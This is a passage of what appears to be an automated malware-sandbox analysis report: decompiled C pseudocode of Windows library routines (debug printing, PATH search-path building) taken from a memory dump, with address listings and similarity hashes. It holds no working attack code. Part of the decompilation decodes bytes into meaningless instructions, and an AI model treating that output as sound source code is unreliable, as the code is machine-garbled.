					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0152D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0151D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0151F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0152DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0151B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0151B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0151E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0151A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                        0x014db171
                                                                        0x014db171
                                                                        0x014db171
                                                                        0x014db171
                                                                        0x014db171
                                                                        0x014db176
                                                                        0x014db17b
                                                                        0x014db180
                                                                        0x014db186
                                                                        0x014db18f
                                                                        0x014db198
                                                                        0x014db1a4
                                                                        0x014db1aa
                                                                        0x01534802
                                                                        0x01534802
                                                                        0x01534805
                                                                        0x0153480c
                                                                        0x0153480e
                                                                        0x014db1d1
                                                                        0x014db1d3
                                                                        0x014db1de
                                                                        0x014db1de
                                                                        0x01534817
                                                                        0x0153481e
                                                                        0x01534820
                                                                        0x01534822
                                                                        0x01534822
                                                                        0x01534824
                                                                        0x01534824
                                                                        0x0153482a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01534835
                                                                        0x0153483a
                                                                        0x0153483d
                                                                        0x0153483f
                                                                        0x01534842
                                                                        0x01534842
                                                                        0x01534842
                                                                        0x01534846
                                                                        0x0153484c
                                                                        0x0153484e
                                                                        0x01534851
                                                                        0x01534851
                                                                        0x01534853
                                                                        0x01534854
                                                                        0x01534854
                                                                        0x01534858
                                                                        0x0153485a
                                                                        0x0153485a
                                                                        0x0153485d
                                                                        0x0153485f
                                                                        0x01534861
                                                                        0x01534861
                                                                        0x01534866
                                                                        0x0153486b
                                                                        0x0153486e
                                                                        0x01534871
                                                                        0x01534876
                                                                        0x01534876
                                                                        0x01534878
                                                                        0x0153487b
                                                                        0x01534884
                                                                        0x01534884
                                                                        0x00000000
                                                                        0x0153487d
                                                                        0x0153487d
                                                                        0x01534882
                                                                        0x01534889
                                                                        0x01534889
                                                                        0x0153488f
                                                                        0x01534891
                                                                        0x015348e0
                                                                        0x015348e2
                                                                        0x015348e4
                                                                        0x015348e4
                                                                        0x015348e7
                                                                        0x015348e7
                                                                        0x015348ed
                                                                        0x015348f4
                                                                        0x015348f6
                                                                        0x01534951
                                                                        0x01534951
                                                                        0x01534953
                                                                        0x01534953
                                                                        0x01534956
                                                                        0x01534956
                                                                        0x01534958
                                                                        0x01534959
                                                                        0x01534959
                                                                        0x0153495d
                                                                        0x0153495d
                                                                        0x0153495f
                                                                        0x0153495f
                                                                        0x01534965
                                                                        0x01534969
                                                                        0x015349ba
                                                                        0x015349ba
                                                                        0x015349c1
                                                                        0x015349c5
                                                                        0x015349cc
                                                                        0x015349d4
                                                                        0x015349d7
                                                                        0x015349da
                                                                        0x015349e4
                                                                        0x015349e5
                                                                        0x015349f3
                                                                        0x01534a02
                                                                        0x00000000
                                                                        0x01534a02
                                                                        0x01534972
                                                                        0x01534974
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01534976
                                                                        0x01534979
                                                                        0x01534982
                                                                        0x01534983
                                                                        0x01534984
                                                                        0x0153498b
                                                                        0x0153498d
                                                                        0x01534991
                                                                        0x01534993
                                                                        0x01534999
                                                                        0x0153499d
                                                                        0x015349a2
                                                                        0x015349a2
                                                                        0x015349a2
                                                                        0x01534999
                                                                        0x015349ac
                                                                        0x00000000
                                                                        0x015349b3
                                                                        0x015348f8
                                                                        0x015348fe
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x015348fe
                                                                        0x01534895
                                                                        0x0153489c
                                                                        0x015348ad
                                                                        0x015348b2
                                                                        0x015348b5
                                                                        0x015348b7
                                                                        0x015348ba
                                                                        0x015348bc
                                                                        0x015348c6
                                                                        0x015348c6
                                                                        0x015348cb
                                                                        0x015348d1
                                                                        0x015348d4
                                                                        0x015348d8
                                                                        0x015348d8
                                                                        0x00000000
                                                                        0x015348d8
                                                                        0x015348be
                                                                        0x015348c0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x015348c2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x015348c4
                                                                        0x00000000
                                                                        0x01534882
                                                                        0x0153487b
                                                                        0x01534904
                                                                        0x01534906
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01534908
                                                                        0x0153490e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01534910
                                                                        0x01534917
                                                                        0x01534917
                                                                        0x00000000
                                                                        0x01534917
                                                                        0x014db1ba
                                                                        0x015347f9
                                                                        0x015347fc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x015347fc
                                                                        0x014db1c0
                                                                        0x014db1c0
                                                                        0x014db1c3
                                                                        0x014db1cb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: _vswprintf_s
                                                                        • String ID:
                                                                        • API String ID: 677850445-0
                                                                        • Opcode ID: d5f0c9f6ed77d0ef20f932a78e8a0f239f0f1118b7ae48b07dbdfa73a1484108
                                                                        • Instruction ID: 78b6519e53094ae8d7552509c089b5a4d1b822d7cd5b0904a00f51f2cd188c02
                                                                        • Opcode Fuzzy Hash: d5f0c9f6ed77d0ef20f932a78e8a0f239f0f1118b7ae48b07dbdfa73a1484108
                                                                        • Instruction Fuzzy Hash: B451D072D0025A8EEF32CF68C844BAEBBB0FF85710F1041ADD859AF292D7744985CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01502581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E01502581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200396, char _a1546912076) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t243;
				signed int _t247;
				char* _t248;
				signed int _t252;
				signed int _t254;
				intOrPtr _t256;
				signed int _t259;
				signed int _t266;
				signed int _t269;
				signed int _t277;
				intOrPtr _t283;
				signed int _t285;
				signed int _t287;
				void* _t288;
				void* _t289;
				signed int _t290;
				unsigned int _t293;
				signed int _t297;
				void* _t298;
				signed int _t299;
				signed int _t303;
				intOrPtr _t315;
				signed int _t324;
				signed int _t326;
				signed int _t327;
				signed int _t331;
				signed int _t332;
				intOrPtr* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				void* _t342;
				void* _t344;

				_t338 = _t341;
				_t342 = _t341 - 0x4c;
				_v8 =  *0x15cd360 ^ _t338;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t331 = 0x15cb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t293 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t283 = 0x48;
				_t313 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t324 = 0;
				_v37 = _t313;
				if(_v48 <= 0) {
					L16:
					_t45 = _t283 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t332 = 0xc0000106;
						goto L32;
					} else {
						_t331 = L014F4620(_t293,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t283);
						_v52 = _t331;
						__eflags = _t331;
						if(_t331 == 0) {
							_t332 = 0xc0000017;
							goto L32;
						} else {
							 *(_t331 + 0x44) =  *(_t331 + 0x44) & 0x00000000;
							_t50 = _t331 + 0x48; // 0x48
							_t326 = _t50;
							_t313 = _v32;
							 *((intOrPtr*)(_t331 + 0x3c)) = _t283;
							_t285 = 0;
							 *((short*)(_t331 + 0x30)) = _v48;
							__eflags = _t313;
							if(_t313 != 0) {
								 *(_t331 + 0x18) = _t326;
								__eflags = _t313 - 0x15c8478;
								 *_t331 = ((0 | _t313 == 0x015c8478) - 0x00000001 & 0xfffffffb) + 7;
								E0151F3E0(_t326,  *((intOrPtr*)(_t313 + 4)),  *_t313 & 0x0000ffff);
								_t313 = _v32;
								_t342 = _t342 + 0xc;
								_t285 = 1;
								__eflags = _a8;
								_t326 = _t326 + (( *_t313 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t277 = E015639F2(_t326);
									_t313 = _v32;
									_t326 = _t277;
								}
							}
							_t297 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t332 = _v68;
								__eflags = 0;
								 *((short*)(_t326 - 2)) = 0;
								goto L32;
							} else {
								_t287 = _t331 + _t285 * 4;
								_v56 = _t287;
								do {
									__eflags = _t313;
									if(_t313 != 0) {
										_t243 =  *(_v60 + _t297 * 4);
										__eflags = _t243;
										if(_t243 == 0) {
											goto L30;
										} else {
											__eflags = _t243 == 5;
											if(_t243 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t287 =  *(_v60 + _t297 * 4);
										 *(_t287 + 0x18) = _t326;
										_t247 =  *(_v60 + _t297 * 4);
										__eflags = _t247 - 8;
										if(_t247 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t247 * 4 +  &M01502959))) {
												case 0:
													__ax =  *0x15c8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0151F3E0(__edi,  *0x15c848c, __ax & 0x0000ffff);
														__eax =  *0x15c8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0151F3E0(_t326, _v80, _v64);
													_t272 = _v64;
													goto L26;
												case 2:
													 *0x15c8480 & 0x0000ffff = E0151F3E0(__edi,  *0x15c8484,  *0x15c8480 & 0x0000ffff);
													__eax =  *0x15c8480 & 0x0000ffff;
													__eax = ( *0x15c8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0151F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0151F3E0(_t326, _v76, _v36);
														_t272 = _v36;
													}
													L26:
													_t342 = _t342 + 0xc;
													_t326 = _t326 + (_t272 >> 1) * 2 + 2;
													__eflags = _t326;
													L27:
													_push(0x3b);
													_pop(_t274);
													 *((short*)(_t326 - 2)) = _t274;
													goto L28;
												case 6:
													__ebx =  *0x15c575c;
													__eflags = __ebx - 0x15c575c;
													if(__ebx != 0x15c575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0151F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x15c575c;
														} while (__ebx != 0x15c575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x15c8478 & 0x0000ffff = E0151F3E0(__edi,  *0x15c847c,  *0x15c8478 & 0x0000ffff);
													__eax =  *0x15c8478 & 0x0000ffff;
													__eax = ( *0x15c8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E015639F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x15c6e58 & 0x0000ffff = E0151F3E0(__edi,  *0x15c6e5c,  *0x15c6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x15c6e58 & 0x0000ffff;
													__eax = ( *0x15c6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t297 = _v16;
													_t313 = _v32;
													L29:
													_t287 = _t287 + 4;
													__eflags = _t287;
													_v56 = _t287;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t297 = _t297 + 1;
									_v16 = _t297;
									__eflags = _t297 - _v48;
								} while (_t297 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t247 =  *(_v60 + _t324 * 4);
						if(_t247 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t247 * 4 +  &M01502935))) {
							case 0:
								__ax =  *0x15c8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t313 =  &_v64;
								_v80 = E01502E3E(0,  &_v64);
								_t283 = _t283 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x15c8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x15c8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E014EEEF0(0x15c79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E014EEB70(__ecx, 0x15c79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t221 = _v72;
											__eflags = _t221;
											if(_t221 != 0) {
												L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t221);
											}
											_t222 = _v52;
											__eflags = _t222;
											if(_t222 != 0) {
												__eflags = _t332;
												if(_t332 < 0) {
													L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t222);
													_t222 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t293 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x15c7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L014F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E014EEB70(__ecx, 0x15c79a0);
										__eax = _v52;
										L36:
										_pop(_t325);
										_pop(_t333);
										__eflags = _v8 ^ _t338;
										_pop(_t284);
										return E0151B640(_t222, _t284, _v8 ^ _t338, _t313, _t325, _t333);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t279 = _v56;
								if(_v56 != 0) {
									_t313 =  &_v36;
									_t281 = E01502E3E(_t279,  &_v36);
									_t293 = _v36;
									_v76 = _t281;
								}
								if(_t293 == 0) {
									goto L44;
								} else {
									_t283 = _t283 + 2 + _t293;
								}
								goto L14;
							case 6:
								__eax =  *0x15c5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x15c8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x15c8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x15c6e58 & 0x0000ffff;
								__eax = ( *0x15c6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t324 = _t324 + 1;
								if(_t324 >= _v48) {
									goto L16;
								} else {
									_t313 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t298 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					_push(_t247);
					 *((intOrPtr*)(_t331 + 0x28)) =  *((intOrPtr*)(_t331 + 0x28)) + _t342;
					_push(_t247);
					_t248 = _t247 + _t342;
					asm("daa");
					_push(_t248);
					 *_t331 =  *_t331 + _t338;
					_push(_t248);
					 *((intOrPtr*)(_t331 + 0x28)) =  *((intOrPtr*)(_t331 + 0x28)) + _t248;
					 *0x1f015026 =  *0x1f015026 + _t248;
					_t288 = _t248;
					_push(_t342);
					 *((intOrPtr*)(_t248 +  &_a1530200396)) =  *((intOrPtr*)(_t248 +  &_a1530200396)) + _t313;
					_push(_t342);
					 *_t313 =  *_t313 + _t248;
					 *((intOrPtr*)(_t248 + 1)) =  *((intOrPtr*)(_t248 + 1)) - _t313;
					 *_t248 =  *_t248 - 0x50;
					_t334 = _t331 + _t331;
					asm("daa");
					_push(_t248);
					 *_t334 =  *_t334 + _t288;
					 *((intOrPtr*)(_t248 + 1)) =  *((intOrPtr*)(_t248 + 1)) - _t313;
					_t335 = _t334 - 1;
					 *((intOrPtr*)(_t248 + 1)) =  *((intOrPtr*)(_t248 + 1)) - _t313;
					asm("daa");
					_t289 = _t248;
					_push(_t342);
					 *((intOrPtr*)(_t248 + _t288 +  &_a1546912076)) =  *((intOrPtr*)(_t248 + _t288 +  &_a1546912076)) + _t334 - 1;
					_push(_t342);
					_t344 = _t342 + _t298;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x15aff00);
					E0152D08C(_t289, _t326, _t335);
					_v44 =  *[fs:0x18];
					_t327 = 0;
					 *_a24 = 0;
					_t290 = _a12;
					__eflags = _t290;
					if(_t290 == 0) {
						_t252 = 0xc0000100;
					} else {
						_v8 = 0;
						_t336 = 0xc0000100;
						_v52 = 0xc0000100;
						_t254 = 4;
						while(1) {
							_v40 = _t254;
							__eflags = _t254;
							if(_t254 == 0) {
								break;
							}
							_t303 = _t254 * 0xc;
							_v48 = _t303;
							__eflags = _t290 -  *((intOrPtr*)(_t303 + 0x14b1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t269 = E0151E5C0(_a8,  *((intOrPtr*)(_t303 + 0x14b1668)), _t290);
									_t344 = _t344 + 0xc;
									__eflags = _t269;
									if(__eflags == 0) {
										_t336 = E015551BE(_t290,  *((intOrPtr*)(_v48 + 0x14b166c)), _a16, _t327, _t336, __eflags, _a20, _a24);
										_v52 = _t336;
										break;
									} else {
										_t254 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t254 = _t254 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t336;
						__eflags = _t336;
						if(_t336 < 0) {
							__eflags = _t336 - 0xc0000100;
							if(_t336 == 0xc0000100) {
								_t299 = _a4;
								__eflags = _t299;
								if(_t299 != 0) {
									_v36 = _t299;
									__eflags =  *_t299 - _t327;
									if( *_t299 == _t327) {
										_t336 = 0xc0000100;
										goto L76;
									} else {
										_t315 =  *((intOrPtr*)(_v44 + 0x30));
										_t256 =  *((intOrPtr*)(_t315 + 0x10));
										__eflags =  *((intOrPtr*)(_t256 + 0x48)) - _t299;
										if( *((intOrPtr*)(_t256 + 0x48)) == _t299) {
											__eflags =  *(_t315 + 0x1c);
											if( *(_t315 + 0x1c) == 0) {
												L106:
												_t336 = E01502AE4( &_v36, _a8, _t290, _a16, _a20, _a24);
												_v32 = _t336;
												__eflags = _t336 - 0xc0000100;
												if(_t336 != 0xc0000100) {
													goto L69;
												} else {
													_t327 = 1;
													_t299 = _v36;
													goto L75;
												}
											} else {
												_t259 = E014E6600( *(_t315 + 0x1c));
												__eflags = _t259;
												if(_t259 != 0) {
													goto L106;
												} else {
													_t299 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t336 = E01502C50(_t299, _a8, _t290, _a16, _a20, _a24, _t327);
											L76:
											_v32 = _t336;
											goto L69;
										}
									}
									goto L108;
								} else {
									E014EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t336 = _a24;
									_t266 = E01502AE4( &_v36, _a8, _t290, _a16, _a20, _t336);
									_v32 = _t266;
									__eflags = _t266 - 0xc0000100;
									if(_t266 == 0xc0000100) {
										_v32 = E01502C50(_v36, _a8, _t290, _a16, _a20, _t336, 1);
									}
									_v8 = _t327;
									E01502ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t252 = _t336;
					}
					L70:
					return E0152D0D1(_t252);
				}
				L108:
			}






















































                                                                        0x01502584
                                                                        0x01502586
                                                                        0x01502590
                                                                        0x01502596
                                                                        0x01502597
                                                                        0x01502598
                                                                        0x01502599
                                                                        0x0150259e
                                                                        0x015025a4
                                                                        0x015025a9
                                                                        0x015025ac
                                                                        0x015025ae
                                                                        0x015025b1
                                                                        0x015025b2
                                                                        0x015025b5
                                                                        0x015025b8
                                                                        0x015025bb
                                                                        0x015025bc
                                                                        0x015025bf
                                                                        0x015025c2
                                                                        0x015025c5
                                                                        0x015025c6
                                                                        0x015025cb
                                                                        0x015025ce
                                                                        0x015025d8
                                                                        0x015025dd
                                                                        0x015025de
                                                                        0x015025e1
                                                                        0x015025e3
                                                                        0x015025e9
                                                                        0x015026da
                                                                        0x015026da
                                                                        0x015026dd
                                                                        0x015026e2
                                                                        0x01545b56
                                                                        0x00000000
                                                                        0x015026e8
                                                                        0x015026f9
                                                                        0x015026fb
                                                                        0x015026fe
                                                                        0x01502700
                                                                        0x01545b60
                                                                        0x00000000
                                                                        0x01502706
                                                                        0x01502706
                                                                        0x0150270a
                                                                        0x0150270a
                                                                        0x0150270d
                                                                        0x01502713
                                                                        0x01502716
                                                                        0x01502718
                                                                        0x0150271c
                                                                        0x0150271e
                                                                        0x01545b6c
                                                                        0x01545b6f
                                                                        0x01545b7f
                                                                        0x01545b89
                                                                        0x01545b8e
                                                                        0x01545b93
                                                                        0x01545b96
                                                                        0x01545b9c
                                                                        0x01545ba0
                                                                        0x01545ba3
                                                                        0x01545bab
                                                                        0x01545bb0
                                                                        0x01545bb3
                                                                        0x01545bb3
                                                                        0x01545ba3
                                                                        0x01502724
                                                                        0x01502726
                                                                        0x01502729
                                                                        0x0150272c
                                                                        0x0150279d
                                                                        0x0150279d
                                                                        0x015027a0
                                                                        0x015027a2
                                                                        0x00000000
                                                                        0x0150272e
                                                                        0x0150272e
                                                                        0x01502731
                                                                        0x01502734
                                                                        0x01502734
                                                                        0x01502736
                                                                        0x01545bc1
                                                                        0x01545bc1
                                                                        0x01545bc4
                                                                        0x00000000
                                                                        0x01545bca
                                                                        0x01545bca
                                                                        0x01545bcd
                                                                        0x00000000
                                                                        0x01545bd3
                                                                        0x00000000
                                                                        0x01545bd3
                                                                        0x01545bcd
                                                                        0x0150273c
                                                                        0x0150273c
                                                                        0x01502742
                                                                        0x01502747
                                                                        0x0150274a
                                                                        0x0150274d
                                                                        0x01502750
                                                                        0x00000000
                                                                        0x01502756
                                                                        0x01502756
                                                                        0x00000000
                                                                        0x01502902
                                                                        0x01502908
                                                                        0x0150290b
                                                                        0x00000000
                                                                        0x01502911
                                                                        0x0150291c
                                                                        0x01502921
                                                                        0x00000000
                                                                        0x01502921
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01502880
                                                                        0x01502887
                                                                        0x0150288c
                                                                        0x00000000
